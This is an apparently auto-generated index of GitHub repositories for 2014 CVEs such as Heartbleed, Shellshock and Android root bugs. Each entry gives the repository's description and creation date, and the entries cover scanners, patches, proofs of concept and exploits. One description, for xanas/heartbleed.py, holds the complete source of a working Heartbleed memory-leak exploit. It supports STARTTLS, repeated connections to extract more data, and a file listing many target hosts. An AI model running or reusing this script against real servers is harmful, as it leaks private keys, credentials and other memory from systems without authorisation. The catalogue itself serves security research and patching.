**Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160.** : [GeeksXtreme/ssl-heartbleed.nse](https://api.github.com/repos/GeeksXtreme/ssl-heartbleed.nse) create time: 2014-04-13T12:14:29Z

**Script to find Exit and Guard nodes in the Tor Network, that are still suffering from CVE-2014-0160** : [wwwiretap/bleeding_onions](https://api.github.com/repos/wwwiretap/bleeding_onions) create time: 2014-04-12T21:04:55Z

**A checker (site and tool) for CVE-2014-0160: ** : [indiw0rm/-Heartbleed-](https://api.github.com/repos/indiw0rm/-Heartbleed-) create time: 2014-04-15T09:30:40Z

**I think this CVE is full of lies and deceit and very confusing code.** : [adrienthebo/cve-2014-2734](https://api.github.com/repos/adrienthebo/cve-2014-2734) create time: 2014-04-17T06:51:01Z

**bleed is a tool to test servers for the 'Heartbleed' vulnerability (CVE-2014-0160).** : [DominikTo/bleed](https://api.github.com/repos/DominikTo/bleed) create time: 2014-04-08T09:03:01Z

**Linux local root exploit for CVE-2014-0038** : [saelo/cve-2014-0038](https://api.github.com/repos/saelo/cve-2014-0038) create time: 2014-02-02T12:34:57Z

**Ruby OpenSSL CA Private Key Spoofing** : [gdisneyleugers/CVE-2014-2734](https://api.github.com/repos/gdisneyleugers/CVE-2014-2734) create time: 2014-04-16T18:38:12Z

**Maltego transform to detect the OpenSSL Heartbleed vulnerability (CVE-2014-0160)** : [DisK0nn3cT/MaltegoHeartbleed](https://api.github.com/repos/DisK0nn3cT/MaltegoHeartbleed) create time: 2014-05-01T08:28:45Z

**CVE-2014-0160 (Heartbeat Buffer over-read bug)** : [OffensivePython/HeartLeak](https://api.github.com/repos/OffensivePython/HeartLeak) create time: 2014-05-03T18:08:27Z

**POC of CVE-2014-0166 (WordPress cookie forgery vulnerability)** : [Ettack/POC-CVE-2014-0166](https://api.github.com/repos/Ettack/POC-CVE-2014-0166) create time: 2014-04-26T10:14:44Z

**Heartbleed variants** : [0x90/CVE-2014-0160](https://api.github.com/repos/0x90/CVE-2014-0160) create time: 2014-04-10T02:47:43Z

**Our final project for the Spring 2014 CS465 (Information Visualization) class at Middlebury College -- a visualizer for CVE vulnerabilities.** : [dantrauner/cs465finalproject](https://api.github.com/repos/dantrauner/cs465finalproject) create time: 2014-04-20T23:19:43Z

**CVE-2014-0196: Linux kernel pty layer race condition memory corruption** : [tempbottle/CVE-2014-0196](https://api.github.com/repos/tempbottle/CVE-2014-0196) create time: 2014-12-17T07:39:00Z

**None** : [SunRain/CVE-2014-0196](https://api.github.com/repos/SunRain/CVE-2014-0196) create time: 2014-05-13T12:34:51Z

**Demonstration of CVE-2014-3120** : [jeffgeiger/es_inject](https://api.github.com/repos/jeffgeiger/es_inject) create time: 2014-05-13T16:37:29Z

**OpenSSL CVE-2014-0160 Heartbleed vulnerability test** : [titanous/heartbleeder](https://api.github.com/repos/titanous/heartbleeder) create time: 2014-04-08T04:25:23Z

**Mass, multithreaded testing for servers against Heartbleed (CVE-2014-0160).** : [cyphar/heartthreader](https://api.github.com/repos/cyphar/heartthreader) create time: 2014-04-08T09:08:52Z

**None** : [iph0n3/CVE-2014-0224](https://api.github.com/repos/iph0n3/CVE-2014-0224) create time: 2014-07-08T08:08:00Z

**struts1 CVE-2014-0114 classLoader manipulation vulnerability patch** : [ricedu/struts1-patch](https://api.github.com/repos/ricedu/struts1-patch) create time: 2014-06-10T08:27:10Z

**OpenSSL heap overflow PoC (CVE-2014-0195)** : [ricedu/CVE-2014-0195](https://api.github.com/repos/ricedu/CVE-2014-0195) create time: 2014-06-10T09:28:22Z

**OpenSSL Heartbleed (CVE-2014-0160) vulnerability scanner, data miner and RSA key-restore tools.** : [einaros/heartbleed-tools](https://api.github.com/repos/einaros/heartbleed-tools) create time: 2014-04-15T14:09:54Z

**POC Code to exploite CVE-2014-3120** : [echohtp/ElasticSearch-CVE-2014-3120](https://api.github.com/repos/echohtp/ElasticSearch-CVE-2014-3120) create time: 2014-07-07T20:28:34Z

**Test for SSL heartbeat vulnerability (CVE-2014-0160)** : [sensepost/heartbleed-poc](https://api.github.com/repos/sensepost/heartbleed-poc) create time: 2014-04-09T15:59:14Z

**Used for evaluating hosts for CVE-2014-0224** : [droptables/ccs-eval](https://api.github.com/repos/droptables/ccs-eval) create time: 2014-07-10T21:32:28Z

**None** : [secretnonempty/CVE-2014-0224](https://api.github.com/repos/secretnonempty/CVE-2014-0224) create time: 2014-07-16T13:09:41Z

**This script is designed for detection of vulnerable servers (CVE-2014-0224.) in a wide range of configurations. It attempts to negotiate using each affected protocol version (SSLv3, TLSv1, TLSv1.1, and TLSv1.2) advertising a comprehensive set of ciphers.** : [Tripwire/OpenSSL-CCS-Inject-Test](https://api.github.com/repos/Tripwire/OpenSSL-CCS-Inject-Test) create time: 2014-06-12T04:44:13Z

**Technicolor TC7200 - Credentials Disclosure CVE : CVE-2014-1677** : [tihmstar/freePW_tc7200Eploit](https://api.github.com/repos/tihmstar/freePW_tc7200Eploit) create time: 2014-07-31T17:01:29Z

**None** : [molnarg/cve-2014-0521](https://api.github.com/repos/molnarg/cve-2014-0521) create time: 2014-08-23T09:54:18Z

**Collected fixes for bash CVE-2014-6271** : [dlitz/bash-cve-2014-6271-fixes](https://api.github.com/repos/dlitz/bash-cve-2014-6271-fixes) create time: 2014-09-24T16:26:17Z

**Patch for CVE-2014-6271** : [npm/ansible-bashpocalypse](https://api.github.com/repos/npm/ansible-bashpocalypse) create time: 2014-09-24T18:27:03Z

**None** : [rrreeeyyy/cve-2014-6271-spec](https://api.github.com/repos/rrreeeyyy/cve-2014-6271-spec) create time: 2014-09-25T01:12:04Z

**a auto script to fix CVE-2014-6271 bash vulnerability** : [justzx2011/bash-up](https://api.github.com/repos/justzx2011/bash-up) create time: 2014-09-25T06:24:18Z

**None** : [mattclegg/CVE-2014-6271](https://api.github.com/repos/mattclegg/CVE-2014-6271) create time: 2014-09-25T08:10:26Z

**Chef cookbook that will fail if bash vulnerability found per CVE-2014-6271** : [jblaine/cookbook-bash-CVE-2014-6271](https://api.github.com/repos/jblaine/cookbook-bash-CVE-2014-6271) create time: 2014-09-25T00:11:01Z

**CVE-2014-6271 RCE tool ** : [RainMak3r/Rainstorm](https://api.github.com/repos/RainMak3r/Rainstorm) create time: 2014-09-25T12:28:33Z

**CVE-2014-6271 (ShellShock) RCE PoC tool ** : [securusglobal/BadBash](https://api.github.com/repos/securusglobal/BadBash) create time: 2014-09-26T01:30:14Z

**scaner for cve-2014-6271** : [villadora/CVE-2014-6271](https://api.github.com/repos/villadora/CVE-2014-6271) create time: 2014-09-26T04:15:15Z

**None** : [woltage/CVE-2014-6271](https://api.github.com/repos/woltage/CVE-2014-6271) create time: 2014-09-25T13:06:50Z

**CVE 2014-6271 PoC Tool by kaitoY ** : [ksang/shellshock](https://api.github.com/repos/ksang/shellshock) create time: 2014-09-26T04:41:51Z

**Salt recipe for shellshock (CVE-2014-6271)** : [APSL/salt-shellshock](https://api.github.com/repos/APSL/salt-shellshock) create time: 2014-09-26T10:30:37Z

**Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64)** : [internero/debian-lenny-bash_3.2.52-cve-2014-6271](https://api.github.com/repos/internero/debian-lenny-bash_3.2.52-cve-2014-6271) create time: 2014-09-26T18:59:04Z

**patched-bash-4.3 for CVE-2014-6271** : [ryancnelson/patched-bash-4.3](https://api.github.com/repos/ryancnelson/patched-bash-4.3) create time: 2014-09-24T21:24:43Z

**Using google to scan sites for "ShellShock" (CVE-2014-6271)** : [vonnyfly/shellshock_crawler](https://api.github.com/repos/vonnyfly/shellshock_crawler) create time: 2014-09-27T04:08:19Z

**scripts associate with bourne shell EVN function parsing vulnerability CVE-2014-6271** : [themson/shellshock](https://api.github.com/repos/themson/shellshock) create time: 2014-09-25T22:22:40Z

**None** : [u20024804/bash-3.2-fixed-CVE-2014-6271](https://api.github.com/repos/u20024804/bash-3.2-fixed-CVE-2014-6271) create time: 2014-09-27T21:29:23Z

**None** : [u20024804/bash-4.2-fixed-CVE-2014-6271](https://api.github.com/repos/u20024804/bash-4.2-fixed-CVE-2014-6271) create time: 2014-09-27T22:22:27Z

**None** : [u20024804/bash-4.3-fixed-CVE-2014-6271](https://api.github.com/repos/u20024804/bash-4.3-fixed-CVE-2014-6271) create time: 2014-09-27T22:22:41Z

**CVE-2014-6271の検証用Vagrantfileです** : [ariarijp/vagrant-shellshock](https://api.github.com/repos/ariarijp/vagrant-shellshock) create time: 2014-09-25T16:19:41Z

**A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug)** : [proclnas/ShellShock-CGI-Scan](https://api.github.com/repos/proclnas/ShellShock-CGI-Scan) create time: 2014-09-28T18:05:20Z

**CVE-2014-6271 Remote Interactive Shell - PoC Exploit** : [sch3m4/RIS](https://api.github.com/repos/sch3m4/RIS) create time: 2014-09-29T10:06:18Z

**Simple script to check for CVE-2014-6271** : [gabemarshall/shocknaww](https://api.github.com/repos/gabemarshall/shocknaww) create time: 2014-09-25T12:46:13Z

**Proof of Concept for CVE-2014-3466 (GnuTLS buffer overflow: session id length check)** : [azet/CVE-2014-3466_PoC](https://api.github.com/repos/azet/CVE-2014-3466_PoC) create time: 2014-06-01T20:36:31Z

**None** : [ryeyao/CVE-2014-6271_Test](https://api.github.com/repos/ryeyao/CVE-2014-6271_Test) create time: 2014-09-29T13:16:08Z

**This module determine the vulnerability of a bash binary to the shellshock exploits (CVE-2014-6271 or CVE-2014-7169) and then patch that where possible** : [renanvicente/puppet-shellshock](https://api.github.com/repos/renanvicente/puppet-shellshock) create time: 2014-09-29T18:57:38Z

**Python Scanner for "ShellShock" (CVE-2014-6271)** : [scottjpack/shellshock_scanner](https://api.github.com/repos/scottjpack/shellshock_scanner) create time: 2014-09-25T02:15:24Z

**shellshock CVE-2014-6271 CGI Exploit, Use like Openssh via CGI** : [cj1324/CGIShell](https://api.github.com/repos/cj1324/CGIShell) create time: 2014-09-29T16:02:15Z

**Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock** : [indiandragon/Shellshock-Vulnerability-Scan](https://api.github.com/repos/indiandragon/Shellshock-Vulnerability-Scan) create time: 2014-10-03T16:22:28Z

**CydiaSubstrate-based fix for CVE-2014-4377.** : [davidmurray/CVE-2014-4377](https://api.github.com/repos/davidmurray/CVE-2014-4377) create time: 2014-10-04T00:16:04Z

**Heartbleed (CVE-2014-0160) SSLv3 Scanner** : [vortextube/ssl_scanner](https://api.github.com/repos/vortextube/ssl_scanner) create time: 2014-10-12T05:13:06Z

**Exploit for CVE-2014-7236** : [m0nad/CVE-2014-7236_Exploit](https://api.github.com/repos/m0nad/CVE-2014-7236_Exploit) create time: 2014-10-12T21:28:24Z

**Ansible role to check the CVE-2014-6271 vulnerability** : [teedeedubya/bash-fix-exploit](https://api.github.com/repos/teedeedubya/bash-fix-exploit) create time: 2014-09-26T15:21:10Z

**None** : [feliam/CVE-2014-4378](https://api.github.com/repos/feliam/CVE-2014-4378) create time: 2014-09-17T18:17:03Z

**None** : [feliam/CVE-2014-4377](https://api.github.com/repos/feliam/CVE-2014-4377) create time: 2014-09-17T18:16:10Z

**None** : [mikesplain/CVE-2014-3566-poodle-cookbook](https://api.github.com/repos/mikesplain/CVE-2014-3566-poodle-cookbook) create time: 2014-10-16T01:24:38Z

**Python script for automatically protecting your systems against POODLE vulnerability (CVE-2014-3566)** : [stdevel/poodle_protector](https://api.github.com/repos/stdevel/poodle_protector) create time: 2014-10-16T07:49:23Z

**Research of CVE-2014-3153 and its famous exploit towelroot on x86** : [geekben/towelroot](https://api.github.com/repos/geekben/towelroot) create time: 2014-09-20T08:24:15Z

**PowerShell CVE-2014-4113** : [johnjohnsp1/CVE-2014-4113](https://api.github.com/repos/johnjohnsp1/CVE-2014-4113) create time: 2014-11-19T04:26:33Z

**This is a workaround for CVE-2014-0993 and CVE-2014-0994 that patches on memory without the need to recompile your vulnerable software. This is not the Embarcadero official fix, this is only CORE Security workaround.** : [helpsystems/Embarcadero-Workaround](https://api.github.com/repos/helpsystems/Embarcadero-Workaround) create time: 2014-09-22T21:38:26Z

**A simple python shell-like exploit for the Shellschok CVE-2014-6271 bug.** : [pwnGuy/shellshock-shell](https://api.github.com/repos/pwnGuy/shellshock-shell) create time: 2014-09-27T02:03:03Z

**Patch openssl #heartbleed with ansible ** : [jdauphant/patch-openssl-CVE-2014-0160](https://api.github.com/repos/jdauphant/patch-openssl-CVE-2014-0160) create time: 2014-04-08T09:19:49Z

**Repository for CVE-2014-4936 POC code.** : [0x3a/CVE-2014-4936](https://api.github.com/repos/0x3a/CVE-2014-4936) create time: 2014-10-05T19:10:30Z

**PoC for CVE-2014-9390** : [mdisec/CVE-2014-9390](https://api.github.com/repos/mdisec/CVE-2014-9390) create time: 2014-12-19T00:04:06Z

**pyonpyon** : [hakatashi/CVE-2014-9390](https://api.github.com/repos/hakatashi/CVE-2014-9390) create time: 2014-12-19T00:17:09Z

**Updates OS X 10.6.8 NTP to include patch for CVE-2014-9295** : [MacMiniVault/NTPUpdateSnowLeopard](https://api.github.com/repos/MacMiniVault/NTPUpdateSnowLeopard) create time: 2014-12-26T15:30:12Z

**Python scripts to exploit CVE-2014-9016 and CVE-2014-9034** : [c0r3dump3d/wp_drupal_timing_attack](https://api.github.com/repos/c0r3dump3d/wp_drupal_timing_attack) create time: 2014-12-01T14:16:17Z

**None** : [tjjh89017/cve-2014-6332](https://api.github.com/repos/tjjh89017/cve-2014-6332) create time: 2015-01-14T09:57:34Z

**None** : [day6reak/CVE-2014-1773](https://api.github.com/repos/day6reak/CVE-2014-1773) create time: 2015-01-20T23:32:21Z

**None** : [day6reak/CVE-2014-4109](https://api.github.com/repos/day6reak/CVE-2014-4109) create time: 2015-01-20T23:35:26Z

**None** : [day6reak/CVE-2014-4140](https://api.github.com/repos/day6reak/CVE-2014-4140) create time: 2015-01-20T23:56:14Z

**cve2014-3153 exploit for ubuntu x86** : [lieanu/CVE-2014-3153](https://api.github.com/repos/lieanu/CVE-2014-3153) create time: 2015-01-12T16:53:09Z

**Gain privileges:system -> root,as a part of https://github.com/retme7/CVE-2014-7911_poc** : [retme7/CVE-2014-4322_poc](https://api.github.com/repos/retme7/CVE-2014-4322_poc) create time: 2015-01-26T07:02:26Z

**Local root exploit for Nexus5 Android 4.4.4(KTU84P)** : [retme7/CVE-2014-7911_poc](https://api.github.com/repos/retme7/CVE-2014-7911_poc) create time: 2015-01-26T06:33:52Z

**Apple CoreGraphics framework fails to validate the input when parsing CCITT group 3 encoded data resulting in a heap overflow condition. A small heap memory allocation can be overflowed with controlled data from the input resulting in arbitrary code execution in the context of Mobile Safari.** : [feliam/CVE-2014-4481](https://api.github.com/repos/feliam/CVE-2014-4481) create time: 2015-01-28T00:02:06Z

**This is an Android Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271** : [sunnyjiang/shellshocker-android](https://api.github.com/repos/sunnyjiang/shellshocker-android) create time: 2015-06-17T12:36:49Z

**Writeup of the Oracle DSR stack buffer overflow vulnerability (DRA) CVE-2014-6598** : [KPN-CISO/DRA_writeup](https://api.github.com/repos/KPN-CISO/DRA_writeup) create time: 2015-01-29T09:43:23Z

**LG On Screen Phone authentication bypass PoC (CVE-2014-8757)** : [irsl/lgosp-poc](https://api.github.com/repos/irsl/lgosp-poc) create time: 2015-02-03T13:46:45Z

**Windows 2k3 tcpip.sys Privilege Escalation** : [fungoshacks/CVE-2014-4076](https://api.github.com/repos/fungoshacks/CVE-2014-4076) create time: 2015-08-20T10:56:52Z

**CVE-2014-3341 exploit** : [ehabhussein/snmpvlan](https://api.github.com/repos/ehabhussein/snmpvlan) create time: 2014-06-28T09:34:35Z

**This is a Python Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271** : [akiraaisha/shellshocker-python](https://api.github.com/repos/akiraaisha/shellshocker-python) create time: 2015-02-22T17:32:48Z

**CVE-2014-4321 exploit** : [android-rooting-tools/libmsm_vfe_read_exploit](https://api.github.com/repos/android-rooting-tools/libmsm_vfe_read_exploit) create time: 2015-03-08T06:13:36Z

**None** : [niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204](https://api.github.com/repos/niccoX/patch-openssl-CVE-2014-0291_CVE-2015-0204) create time: 2015-03-23T10:18:08Z

**#!/usr/bin/python # Modified by Travis Lee # -changed output to display text only instead of hexdump and made it easier to read # -added option to specify number of times to connect to server (to get more data) # -added option to specify TLS version # -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc... # -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port) # -added option to have verbose output # -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command # Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected]) # The author disclaims copyright to this source code. import sys import struct import socket import time import select import re from optparse import OptionParser options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)') options.add_option('-t', '--tls', type='int', default=1, help='Specify TLS version: 0 = 1.0, 1 = 1.1, 2 = 1.2 (default: 1)') options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...') options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port') options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output') opts, args = options.parse_args() def h2bin(x): return x.replace(' ', '').replace('\n', '').decode('hex') hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''') # set TLS version if opts.tls == 0: hb = h2bin('''18 03 01 00 03 01 40 00''') elif opts.tls == 1: hb = h2bin('''18 03 02 00 03 01 40 00''') elif opts.tls == 2: hb = h2bin('''18 03 03 00 03 01 40 00''') else: hb = h2bin('''18 03 02 00 03 01 40 00''') def hexdump(s): pdat = '' for b in xrange(0, len(s), 16): lin = [c for c in s[b : b + 16]] #hxdat = ' '.join('%02X' % ord(c) for c in lin) pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin) #print ' %04x: %-48s %s' % (b, hxdat, pdat) pdat = re.sub(r'([.]{50,})', '', pdat) return pdat def recvall(s, length, timeout=5): try: endtime = time.time() + timeout rdata = '' remain = length while remain > 0: rtime = endtime - time.time() if rtime < 0: return None r, w, e = select.select([s], [], [], 5) if s in r: data = s.recv(remain) # EOF? if not data: return None rdata += data remain -= len(data) return rdata except: print "Error receiving data: ", sys.exc_info()[0] def recvmsg(s): hdr = recvall(s, 5) if hdr is None: print 'Unexpected EOF receiving record header - server closed connection' return None, None, None typ, ver, ln = struct.unpack('>BHH', hdr) pay = recvall(s, ln, 10) if pay is None: print 'Unexpected EOF receiving record payload - server closed connection' return None, None, None if opts.verbose: print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)) return typ, ver, pay def hit_hb(s, targ): s.send(hb) while True: typ, ver, pay = recvmsg(s) if typ is None: print 'No heartbeat response received, server likely not vulnerable' return '' if typ == 24: if opts.verbose: print 'Received heartbeat response...' #hexdump(pay) if len(pay) > 3: print 'WARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!' else: print 'Server processed malformed heartbeat, but did not return any extra data.' return hexdump(pay) if typ == 21: print 'Received alert:' hexdump(pay) print 'Server returned error, likely not vulnerable' return '' def bleed(targ, port): try: res = '' print print '##################################################################' print 'Connecting to: ' + targ + ':' + str(port) + ' with TLSv1.' + str(opts.tls) for x in range(0, opts.num): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sys.stdout.flush() s.settimeout(10) s.connect((targ, port)) # send starttls command if specified as an option or if common smtp/pop3/imap ports are used if (opts.starttls) or (port in {25, 587, 110, 143, 21}): stls = False atls = False # check if smtp supports starttls/stls if port in {25, 587}: print 'SMTP Port... Checking for STARTTLS Capability...' check = s.recv(1024) s.send("EHLO someone.org\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if pop3/imap supports starttls/stls elif port in {110, 143}: print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...' check = s.recv(1024) if port == 110: s.send("CAPA\n") if port == 143: s.send("CAPABILITY\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "STLS" in check: opts.starttls = True stls = True print "STLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # check if ftp supports auth tls/starttls elif port in {21}: print 'FTP Port... Checking for AUTH TLS Capability...' check = s.recv(1024) s.send("FEAT\n") sys.stdout.flush() check += s.recv(1024) if opts.verbose: print check if "STARTTLS" in check: opts.starttls = True print "STARTTLS command found" elif "AUTH TLS" in check: opts.starttls = True atls = True print "AUTH TLS command found" else: print "STARTTLS command NOT found!" print '##################################################################' return # send appropriate tls command if supported if opts.starttls: sys.stdout.flush() if stls: print 'Sending STLS Command...' s.send("STLS\n") elif atls: print 'Sending AUTH TLS Command...' s.send("AUTH TLS\n") else: print 'Sending STARTTLS Command...' s.send("STARTTLS\n") if opts.verbose: print 'Waiting for reply...' sys.stdout.flush() recvall(s, 100000, 1) print print 'Sending Client Hello...' sys.stdout.flush() s.send(hello) if opts.verbose: print 'Waiting for Server Hello...' sys.stdout.flush() while True: typ, ver, pay = recvmsg(s) if typ == None: print 'Server closed connection without sending Server Hello.' print '##################################################################' return # Look for server hello done message. if typ == 22 and ord(pay[0]) == 0x0E: break print 'Sending heartbeat request...' sys.stdout.flush() s.send(hb) res += hit_hb(s, targ) s.close() print '##################################################################' print return res except: print "Error connecting to host: ", sys.exc_info()[0] print '##################################################################' print def main(): allresults = '' # if a file is specified, loop through file if opts.filein: fileIN = open(opts.filein, "r") for line in fileIN: targetinfo = line.strip().split(":") if len(targetinfo) > 1: allresults = bleed(targetinfo[0], int(targetinfo[1])) else: allresults = bleed(targetinfo[0], opts.port) if allresults: print '%s' % (allresults) fileIN.close() else: if len(args) < 1: options.print_help() return allresults = bleed(args[0], opts.port) if allresults: print '%s' % (allresults) print if __name__ == '__main__': main()** : [xanas/heartbleed.py](https://api.github.com/repos/xanas/heartbleed.py) create time: 2015-04-05T22:03:30Z

**None** : [locisvv/Vulnerable-CVE-2014-8609](https://api.github.com/repos/locisvv/Vulnerable-CVE-2014-8609) create time: 2015-04-07T09:50:50Z

**Just an attempt to adapt for Note 4, I do not know what I am doing.** : [askk/CVE-2014-4322_adaptation](https://api.github.com/repos/askk/CVE-2014-4322_adaptation) create time: 2015-09-04T12:05:56Z

**openssl Heartbleed bug(CVE-2014-0160) check for Node.js ** : [yryz/heartbleed.js](https://api.github.com/repos/yryz/heartbleed.js) create time: 2014-04-19T06:20:44Z

**A research tool designed to check for OpenSSL CVE-2014-0160 vulnerability** : [xlucas/heartbleed](https://api.github.com/repos/xlucas/heartbleed) create time: 2014-04-13T19:18:32Z

**A checker (site and tool) for CVE-2014-0160. Software from @FiloSottile for iSC Inc..** : [iSCInc/heartbleed](https://api.github.com/repos/iSCInc/heartbleed) create time: 2015-05-08T14:37:44Z

**system reading course** : [kelleykong/cve-2014-6271-mengjia-kong](https://api.github.com/repos/kelleykong/cve-2014-6271-mengjia-kong) create time: 2015-06-06T03:27:24Z

**None** : [marstornado/cve-2014-0160-Yunfeng-Jiang](https://api.github.com/repos/marstornado/cve-2014-0160-Yunfeng-Jiang) create time: 2015-06-09T03:55:14Z

**reading course** : [huanlu/cve-2014-6271-huan-lu](https://api.github.com/repos/huanlu/cve-2014-6271-huan-lu) create time: 2015-06-10T02:04:43Z

**A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server** : [francisck/shellshock-cgi](https://api.github.com/repos/francisck/shellshock-cgi) create time: 2014-09-28T04:08:07Z

**A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug).** : [P0cL4bs/ShellShock-CGI-Scan](https://api.github.com/repos/P0cL4bs/ShellShock-CGI-Scan) create time: 2015-06-26T23:34:01Z

**Multi-threaded tool for scanning many hosts for CVE-2014-0160.** : [musalbas/heartbleed-masstest](https://api.github.com/repos/musalbas/heartbleed-masstest) create time: 2014-04-08T10:10:43Z

**towelroot** : [c3c/CVE-2014-3153](https://api.github.com/repos/c3c/CVE-2014-3153) create time: 2016-05-29T18:39:15Z

**CloudPassage Halo policy for detecting vulnerability to CVE-2014-3566 (AKA POODLE)** : [ashmastaflash/mangy-beast](https://api.github.com/repos/ashmastaflash/mangy-beast) create time: 2014-10-17T22:30:03Z

**Network Scanner for OpenSSL Memory Leak (CVE-2014-0160) ** : [hybridus/heartbleedscanner](https://api.github.com/repos/hybridus/heartbleedscanner) create time: 2015-09-24T08:39:28Z

**None** : [gina-alaska/bash-cve-2014-7169-cookbook](https://api.github.com/repos/gina-alaska/bash-cve-2014-7169-cookbook) create time: 2015-09-30T18:06:13Z

**CVE-2014-3153 exploit** : [android-rooting-tools/libfutex_exploit](https://api.github.com/repos/android-rooting-tools/libfutex_exploit) create time: 2014-09-13T06:54:07Z

**cve-2014-4323 poc** : [marcograss/cve-2014-4323](https://api.github.com/repos/marcograss/cve-2014-4323) create time: 2015-10-15T04:21:08Z

**None** : [heeeeen/CVE-2014-7911poc](https://api.github.com/repos/heeeeen/CVE-2014-7911poc) create time: 2015-11-03T03:42:05Z

**CVE-2014-2323 exploit demonstration** : [cirocosta/lighty-sqlinj-demo](https://api.github.com/repos/cirocosta/lighty-sqlinj-demo) create time: 2015-10-08T12:33:30Z

**None** : [ssllabs/openssl-ccs-cve-2014-0224](https://api.github.com/repos/ssllabs/openssl-ccs-cve-2014-0224) create time: 2014-07-15T10:03:16Z

**Estudo e apresentação do bug CVE-2014-4943 para a disciplina MAC0448** : [redes-2015/l2tp-socket-bug](https://api.github.com/repos/redes-2015/l2tp-socket-bug) create time: 2015-11-22T13:58:57Z

**TORQUE Resource Manager 2.5.x-2.5.13 stack based buffer overflow exploit CVE-2014-8729; CVE-2014-878** : [inso-/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878](https://api.github.com/repos/inso-/TORQUE-Resource-Manager-2.5.x-2.5.13-stack-based-buffer-overflow-exploit-CVE-2014-8729-CVE-2014-878) create time: 2015-03-20T22:41:03Z

**exploit for cve-2014-7911; android; java deserialization ;system privilege;ace;** : [GeneBlue/cve-2014-7911-exp](https://api.github.com/repos/GeneBlue/cve-2014-7911-exp) create time: 2015-12-29T07:28:46Z

**Heartbleed (CVE-2014-0160) client exploit** : [Lekensteyn/pacemaker](https://api.github.com/repos/Lekensteyn/pacemaker) create time: 2014-04-08T16:41:51Z

**Exploit CVE-2014-4113** : [nsxz/Exploit-CVE-2014-4113](https://api.github.com/repos/nsxz/Exploit-CVE-2014-4113) create time: 2016-01-22T07:05:52Z

**CVE-2014-4322 Exploit** : [laginimaineb/cve-2014-4322](https://api.github.com/repos/laginimaineb/cve-2014-4322) create time: 2015-08-16T00:02:45Z

**Exploit code for CVE-2014-7920 and CVE-2014-7921 - code-exec in mediaserver up to Android 5.1** : [laginimaineb/cve-2014-7920-7921](https://api.github.com/repos/laginimaineb/cve-2014-7920-7921) create time: 2016-01-24T13:49:03Z

**Libvirt - Unauthenticated DoS Vulnerability (Exploit & Time Randomization to Thwart It)** : [tagatac/libvirt-CVE-2014-1447](https://api.github.com/repos/tagatac/libvirt-CVE-2014-1447) create time: 2015-01-24T17:54:08Z

**Trigger and exploit code for CVE-2014-4113** : [sam-b/CVE-2014-4113](https://api.github.com/repos/sam-b/CVE-2014-4113) create time: 2016-02-07T14:18:45Z

**Heartbleed** : [Xyl2k/CVE-2014-0160-Chrome-Plugin](https://api.github.com/repos/Xyl2k/CVE-2014-0160-Chrome-Plugin) create time: 2016-02-16T15:49:55Z

**cve-2014-7920-7921 exploit update** : [Vinc3nt4H/cve-2014-7920-7921_update](https://api.github.com/repos/Vinc3nt4H/cve-2014-7920-7921_update) create time: 2016-02-29T05:07:17Z

**My exploit for kernel exploitation** : [zerodavinci/CVE-2014-3153-exploit](https://api.github.com/repos/zerodavinci/CVE-2014-3153-exploit) create time: 2015-11-08T09:40:59Z

**spring mvc cve-2014-3625** : [ilmila/springcss-cve-2014-3625](https://api.github.com/repos/ilmila/springcss-cve-2014-3625) create time: 2016-02-03T12:51:44Z

